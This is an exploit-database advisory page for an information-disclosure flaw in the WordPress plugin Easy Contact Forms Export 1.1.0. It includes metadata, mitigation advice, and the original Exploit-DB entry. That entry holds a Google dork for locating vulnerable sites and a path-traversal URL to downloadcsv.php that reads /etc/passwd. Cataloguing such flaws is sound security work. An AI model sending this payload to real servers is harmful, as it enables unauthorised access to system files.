header-logo
Suggest Exploit
vendor:
Easy Contact Forms Export
by:
Sammy FORGIT
7,5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: Easy Contact Forms Export
Affected Version From: 1.1.0
Affected Version To: 1.1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:wordpress:easy_contact_forms_exporter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Plugins – Easy Contact Forms Export Information Disclosure Vulnerability

A vulnerability in the Easy Contact Forms Export plugin for Wordpress allows an attacker to access sensitive information from the server. By accessing the downloadcsv.php file with a crafted URL, an attacker can access the /etc/passwd file.

Mitigation:

Update to the latest version of the plugin or disable the plugin if it is not needed.
Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Easy Contact Forms Export 
Information Disclosure Vulnerability
# Version : 1.1.0
# Link : http://wordpress.org/extend/easy-contact-forms-exporter/
# Plugins : 
http://downloads.wordpress.org/plugin/easy-contact-forms-exporter.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/easy-contact-forms-exporter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################

Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd

Navigation

Suggest Exploit

Services By CQR